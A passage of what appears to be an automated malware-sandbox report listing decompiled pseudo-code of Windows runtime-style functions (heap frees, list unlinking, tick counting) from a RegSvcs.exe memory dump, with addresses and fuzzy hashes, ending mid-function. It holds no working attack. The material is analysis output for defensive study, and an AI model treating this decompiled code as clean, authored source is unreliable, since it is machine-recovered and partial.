				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E01339810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}













                                          0x0130842f
                                          0x01308448
                                          0x0130844e
                                          0x01308459
                                          0x0130845b
                                          0x01308464
                                          0x01359ac3
                                          0x01359ac3
                                          0x01359ac5
                                          0x01359acb
                                          0x00000000
                                          0x00000000
                                          0x01359acd
                                          0x01359acd
                                          0x01359ad1
                                          0x01359ae9
                                          0x0130846a
                                          0x01308475
                                          0x01308479
                                          0x0130847c
                                          0x01308481
                                          0x01308482
                                          0x0130849a

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                          • Instruction ID: 68b8282ac6eb1d0119cd2eaa2fd3075e423a5a897402f22475702056318bd45e
                                          • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                          • Instruction Fuzzy Hash: D6219072E00119CBCB14CFA9C580A8AF7F9FB88354F664165ED08B7740C630AE04CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132B390 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0132B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01312280(_t12, 0x13e8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E013300C2(0x13e8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                          0x0132b395
                                          0x0132b3a2
                                          0x0132b3a5
                                          0x0132b3aa
                                          0x0132b3b2
                                          0x0132b3ba
                                          0x0132b3bd
                                          0x0132b3c0
                                          0x0132b3c4
                                          0x0132b3c9
                                          0x0136a3e9
                                          0x0136a3ed
                                          0x0136a3f0
                                          0x0136a3ff
                                          0x0136a403
                                          0x0136a409
                                          0x00000000
                                          0x00000000
                                          0x0136a40b
                                          0x0136a40b
                                          0x0136a40f
                                          0x0136a415
                                          0x0136a423
                                          0x0136a423
                                          0x0136a415
                                          0x0132b3d1
                                          0x0132b3e8
                                          0x0132b3e8
                                          0x0132b3d9

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f95ea24b938ec54e0fd776a61e7dd255cd0c00bbcaf76cf6338c3720d0f0c9ce
                                          • Instruction ID: f2f95ff93774e03370ad31c02e24a0df0860620d56444e50b221b5627eca357a
                                          • Opcode Fuzzy Hash: f95ea24b938ec54e0fd776a61e7dd255cd0c00bbcaf76cf6338c3720d0f0c9ce
                                          • Instruction Fuzzy Hash: 79116B377012209BCB29DA188D81A6BB39AFBC5378B384129DE16E7784CA719C02C694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012F9240 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E012F9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x13cf708);
				E0134D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E013395D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E013395D0();
				_t33 =  *0x13e84c4; // 0x0
				L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x13e84c4; // 0x0
				L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x13e84c4; // 0x0
				E01312280(L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x13e86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E013395D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E013395D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E012F9325();
					_t50 =  *0x13e84c4; // 0x0
					return E0134D0D1(L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                          0x012f9240
                                          0x012f9242
                                          0x012f9247
                                          0x012f924c
                                          0x012f924e
                                          0x012f9255
                                          0x012f9257
                                          0x012f925a
                                          0x012f925f
                                          0x012f925f
                                          0x012f9266
                                          0x012f9271
                                          0x012f9276
                                          0x012f9279
                                          0x012f927e
                                          0x012f9295
                                          0x012f929a
                                          0x012f92b1
                                          0x012f92b6
                                          0x012f92d7
                                          0x012f92dc
                                          0x012f92e0
                                          0x012f92e6
                                          0x012f92e8
                                          0x012f92ee
                                          0x012f9332
                                          0x012f9333
                                          0x012f9337
                                          0x012f9338
                                          0x012f933a
                                          0x012f933a
                                          0x012f933d
                                          0x012f9342
                                          0x012f9342
                                          0x012f9345
                                          0x012f9349
                                          0x012f934e
                                          0x012f9352
                                          0x012f9357
                                          0x012f92f4
                                          0x012f92f4
                                          0x012f92f6
                                          0x012f92f9
                                          0x012f9300
                                          0x012f9306
                                          0x012f9324
                                          0x012f9324

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ab2a485c38131c02df9c4c90f9c7cf6007484e4dfa7e6fbafcc0c888863863cc
                                          • Instruction ID: a99f43f994c352106c05ead136ce66e4e60a0c5f6bf9a635e8ad295c2db3b419
                                          • Opcode Fuzzy Hash: ab2a485c38131c02df9c4c90f9c7cf6007484e4dfa7e6fbafcc0c888863863cc
                                          • Instruction Fuzzy Hash: 73211931451602DFC726EF68CA40F59B7F9EF28708F1445ACE159966A1CA35E981CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01384257 Relevance: .1, Instructions: 60COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E01384257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x13d08d0);
				E0134D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E013841E8(__ebx, __edi, __ecx, _t39);
				E0130EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x13e87e4;
					_t18 =  *0x13e87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x13e5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x13e87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x13e87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L012F7055(_t31 + 0xfffffff8);
								_t24 =  *0x13e87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x13e87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x13e5cd0;
				if( *0x13e5cd0 <= 0) {
					L012F7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x13e87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x13e87e8 = _t30;
						 *0x13e87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0134D0D1(L01384320());
			}















                                          0x01384257
                                          0x01384257
                                          0x01384257
                                          0x01384259
                                          0x0138425e
                                          0x01384263
                                          0x01384265
                                          0x01384273
                                          0x01384278
                                          0x0138427c
                                          0x0138427f
                                          0x01384281
                                          0x01384287
                                          0x013842d7
                                          0x013842d7
                                          0x013842da
                                          0x0138428d
                                          0x0138428d
                                          0x0138428f
                                          0x01384292
                                          0x01384297
                                          0x0138429c
                                          0x013842a0
                                          0x013842a6
                                          0x013842a8
                                          0x013842ae
                                          0x013842b3
                                          0x00000000
                                          0x013842ba
                                          0x013842ba
                                          0x013842bf
                                          0x013842c5
                                          0x013842ca
                                          0x013842cf
                                          0x013842d0
                                          0x00000000
                                          0x013842d0
                                          0x013842b3
                                          0x00000000
                                          0x013842a6
                                          0x0138429c
                                          0x013842dc
                                          0x013842dc
                                          0x013842e3
                                          0x01384309
                                          0x013842e5
                                          0x013842e5
                                          0x013842e8
                                          0x013842ee
                                          0x013842f0
                                          0x00000000
                                          0x013842f2
                                          0x013842f2
                                          0x013842f4
                                          0x013842f7
                                          0x013842f9
                                          0x01384300
                                          0x01384300
                                          0x013842f0
                                          0x0138430e
                                          0x0138431f

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 536ba9796039f42ac243518ba926192578755fe662b9a70a48fc372873c63987
                                          • Instruction ID: 8fc5bd1db7c8a9935e6a5cdedd703bfe1ff1451928b28a51029847d1ab8fc9ea
                                          • Opcode Fuzzy Hash: 536ba9796039f42ac243518ba926192578755fe662b9a70a48fc372873c63987
                                          • Instruction Fuzzy Hash: 91213674A41706CFCB35EF68D100B14BBE5FF95358F6482AED2198FA99EB3194A1CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01322397 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 29%
                                          			E01322397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x13e848c != 0) {
					L0131FAD0(0x13e8610);
					if( *0x13e848c == 0) {
						E0131FA00(0x13e8610, _t19, _t27, 0x13e8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E01322581(0x13e8610, 0x12d50a0, _t26, _t27, _t28);
						E0131FA00(0x13e8610, 0x12d50a0, _t27, 0x13e8610);
					}
				} else {
					L1:
					_t11 =  *0x13e8614; // 0x0
					if(_t11 == 0) {
						_t11 = E01334886(0x12d1088, 1, 0x13e8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E01322581(0x13e8610, (_t11 << 4) + 0x12d5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                          0x013223b0
                                          0x013223b6
                                          0x01322409
                                          0x01322415
                                          0x01365ae9
                                          0x00000000
                                          0x0132241b
                                          0x0132241b
                                          0x0132241d
                                          0x01322427
                                          0x0132242e
                                          0x01322430
                                          0x01322430
                                          0x013223b8
                                          0x013223b8
                                          0x013223b8
                                          0x013223bf
                                          0x013223fc
                                          0x013223fc
                                          0x013223c1
                                          0x013223c3
                                          0x013223d0
                                          0x013223d8
                                          0x013223d8
                                          0x013223dc
                                          0x013223de
                                          0x013223e1
                                          0x013223e1
                                          0x013223ec

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01f1ddc2c5efe51f3f62f7e91683ac0621e1dade76267261ab9114a92a166b9d
                                          • Instruction ID: e2baa187a5af5ee063238229dd9ddb9947a5e1bcd52e8c1147a84d86e8d9dd96
                                          • Opcode Fuzzy Hash: 01f1ddc2c5efe51f3f62f7e91683ac0621e1dade76267261ab9114a92a166b9d
                                          • Instruction Fuzzy Hash: 80114E32B4432567E734BA2DEC40F17B6DCFF60769F14846AFB06AB290C5B4D8448B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013746A7 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E013746A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0133F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0132D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L013177F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                          0x013746b7
                                          0x013746ba
                                          0x013746c5
                                          0x013746c8
                                          0x013746d0
                                          0x013746d4
                                          0x013746e6
                                          0x013746e9
                                          0x013746f4
                                          0x013746ff
                                          0x01374705
                                          0x01374706
                                          0x0137470c
                                          0x01374713
                                          0x0137471b
                                          0x01374723
                                          0x01374725
                                          0x013746d6
                                          0x013746d9
                                          0x013746db
                                          0x013746db
                                          0x01374732

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction ID: 61f7761356a2536ddf1c17e16a44cdf11030e3e4e915992622332262b38cffdf
                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction Fuzzy Hash: 20112572904208BBC7159F5CD8808BEB7B9EF99318F10806EF944C7350DA359D51C7A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013337F5 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E013337F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E01312280(_t6, 0x13e8550);
				}
				_t29 = E0133387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0130FFB0(0x13e8550, _t27, 0x13e8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                          0x013337fa
                                          0x013337fc
                                          0x01333805
                                          0x01333808
                                          0x01333808
                                          0x01333814
                                          0x01333818
                                          0x01333846
                                          0x01333848
                                          0x0133384b
                                          0x0133384b
                                          0x01333852
                                          0x00000000
                                          0x01333854
                                          0x01333856
                                          0x00000000
                                          0x00000000
                                          0x01333863
                                          0x00000000
                                          0x01333863
                                          0x0133381a
                                          0x0133381a
                                          0x0133381f
                                          0x0133386e
                                          0x0133386e
                                          0x01333871
                                          0x01333873
                                          0x01333873
                                          0x01333868
                                          0x00000000
                                          0x01333868
                                          0x01333821
                                          0x01333826
                                          0x00000000
                                          0x00000000
                                          0x01333828
                                          0x0133382a
                                          0x01333841
                                          0x00000000
                                          0x01333841

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c9dd6565608f6ce86b6f9d048b246d414e494a3806f42569d85ef3e9397da50
                                          • Instruction ID: 0b8f629cbbbbf921aacbb96d1472ee4e5788c89d8a9fc5149b0d3059e8dbe5e9
                                          • Opcode Fuzzy Hash: 6c9dd6565608f6ce86b6f9d048b246d414e494a3806f42569d85ef3e9397da50
                                          • Instruction Fuzzy Hash: 4101D672A416219BC3378B1D9940E26BFEAFFC5B58B15806DEA458F255DB34C805C7C4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132002D Relevance: .1, Instructions: 55COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0132002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E01317D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E01317D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E01317D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E01317D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                          0x01320032
                                          0x01320037
                                          0x01320043
                                          0x01364b3a
                                          0x01320049
                                          0x01320049
                                          0x01320049
                                          0x0132004e
                                          0x01320053
                                          0x01364b48
                                          0x01364b5a
                                          0x01364b4a
                                          0x01364b53
                                          0x01364b53
                                          0x01364b5f
                                          0x00000000
                                          0x01364b61
                                          0x00000000
                                          0x01364b61
                                          0x01320059
                                          0x01320059
                                          0x01320060
                                          0x01364b6f
                                          0x01364b6f
                                          0x01320069
                                          0x01364b83
                                          0x00000000
                                          0x00000000
                                          0x01364b90
                                          0x01364b9b
                                          0x01364b9b
                                          0x01364ba4
                                          0x00000000
                                          0x00000000
                                          0x01364baa
                                          0x00000000
                                          0x0132006f
                                          0x0132006f
                                          0x00000000
                                          0x0132006f
                                          0x01320069

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction ID: 4d9764b752f76c1a71d475c59111bd205d13b1b01098ad64c212f95217868a95
                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction Fuzzy Hash: D311C432A056958FE72BAB6CC944B357BECEF4179CF0D80A0ED4487A96E72CD841C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0130766D Relevance: .1, Instructions: 54COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E0130766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0132F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0132F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L01314620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                          0x01307672
                                          0x0130767f
                                          0x01307689
                                          0x013076de
                                          0x013076de
                                          0x0130768b
                                          0x01307691
                                          0x01307693
                                          0x01307697
                                          0x00000000
                                          0x01307699
                                          0x013076a8
                                          0x00000000
                                          0x013076aa
                                          0x013076ad
                                          0x013076b1
                                          0x00000000
                                          0x013076b3
                                          0x013076b3
                                          0x013076b5
                                          0x013076ba
                                          0x013076bc
                                          0x013076bc
                                          0x013076c0
                                          0x00000000
                                          0x013076c2
                                          0x013076ce
                                          0x013076ce
                                          0x013076c0
                                          0x013076b1
                                          0x013076a8
                                          0x01307697
                                          0x013076d9

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction ID: 0a3b4c0b568fedf25cddb7629676743a5fe639de1eb2d8509992f0242aa056ee
                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction Fuzzy Hash: 5F01D432B1011DABC7219E5ECC60E5B7BEDEB84674B280524BA4ADF280DA31EC01C3A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012F9080 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E012F9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
